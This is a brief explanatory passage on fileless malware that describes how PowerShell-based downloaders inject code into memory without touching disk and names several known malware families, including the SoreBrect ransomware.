This is an ongoing trend. This kind of malware is usually coded in PowerShell. Powershell is a scripting language used for Windows to automate tasks. A Powershell script is executed which can directly download and inject code into a legitimate process's memory. So the downloaded malware is never written as a file to the disk. Hence, we call these fileless attacks. Most Powershell malware can be categorized as downloaders.
Here is a list of fileless malware:
- Powerliks
- Kovter
- PowerSnif
- POSHSPY
SoreBrect is a piece of ransomware that uses the fileless technique.